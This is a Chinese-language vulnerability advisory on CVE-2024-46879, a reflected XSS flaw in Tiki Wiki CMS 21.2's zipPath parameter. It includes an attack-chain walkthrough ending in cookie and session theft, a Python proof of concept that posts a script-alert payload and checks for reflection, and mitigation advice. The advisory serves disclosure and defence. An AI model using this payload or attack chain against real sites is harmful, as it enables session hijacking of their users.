IPBUF安全漏洞报告
English
CVE-2024-46879 CVSS 5.4 中危

CVE-2024-46879 Tiki CMS反射型XSS漏洞

披露日期: 2026-03-23

漏洞信息

漏洞编号
CVE-2024-46879
漏洞类型
跨站脚本攻击 (XSS)
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
Tiki Wiki CMS Groupware

相关标签

XSSReflected XSSTiki CMSCVE-2024-46879Web SecurityCross-Site Scripting

漏洞概述

Tiki Wiki CMS Groupware 21.2版本中的tiki-admin_system.php文件存在反射型跨站脚本(XSS)漏洞。该漏洞源于POST请求参数zipPath未经过滤,攻击者可诱导已登录用户点击特制链接,导致恶意JavaScript代码在受害者浏览器中执行,进而窃取敏感信息或执行未授权操作。

技术细节

该漏洞属于反射型跨站脚本攻击(Reflected XSS)。在Tiki CMS 21.2版本中,系统管理文件tiki-admin_system.php接收POST请求参数时,未对'zipPath'参数进行严格的输入验证和HTML实体编码。攻击者可以构造包含恶意脚本(如<script>alert(1)</script>)的POST数据包。由于CVSS向量显示需要用户交互(UI:R)且具有低权限(PR:L),攻击者通常需要进行社会工程学攻击(如钓鱼邮件),诱骗具有访问权限的用户点击发送恶意请求的链接。当服务器响应请求时,未经过滤的payload会被直接反射回页面并在浏览器端解析执行。这允许攻击者劫持用户会话、篡改网页内容或以用户身份执行恶意操作。

攻击链分析

STEP 1
侦察
攻击者识别目标站点使用的是存在漏洞的Tiki CMS 21.2版本。
STEP 2
武器化
攻击者构造包含恶意JavaScript代码的HTTP POST请求,针对tiki-admin_system.php的zipPath参数。
STEP 3
投递
攻击者通过钓鱼邮件或即时通讯工具,诱导目标用户(需具备低权限以上账号)点击特制的链接或提交表单。
STEP 4
利用
目标用户访问链接后,其浏览器向服务器发送恶意请求,服务器将未过滤的脚本反射回页面。
STEP 5
达成目标
恶意脚本在受害者浏览器中执行,窃取Cookie、会话令牌或执行其他未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the vulnerable Tiki CMS instance target_url = "http://example.com/tiki-admin_system.php" # Malicious payload to test XSS vulnerability # Payload attempts to execute a simple JavaScript alert xss_payload = '"><script>alert("CVE-2024-46879-XSS")</script>' # POST data parameters post_data = { "zipPath": xss_payload } try: # Sending POST request to the target response = requests.post(target_url, data=post_data) # Checking if the payload is reflected in the response unfiltered if xss_payload in response.text: print("[+] The application is vulnerable to Reflected XSS.") else: print("[-] Vulnerability could not be confirmed or payload is filtered.") except requests.exceptions.RequestException as e: print(f"Error connecting to target: {e}")

影响范围

Tiki Wiki CMS Groupware 21.2
Tiki Wiki CMS Groupware 21.x (LTS)

防御指南

临时缓解措施
建议管理员立即检查系统版本,若在受影响范围内,应尽快应用官方修复补丁。在无法立即升级的情况下,可使用Web应用防火墙(WAF)规则拦截针对zipPath参数的恶意脚本注入,并限制对系统管理页面的外部访问。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表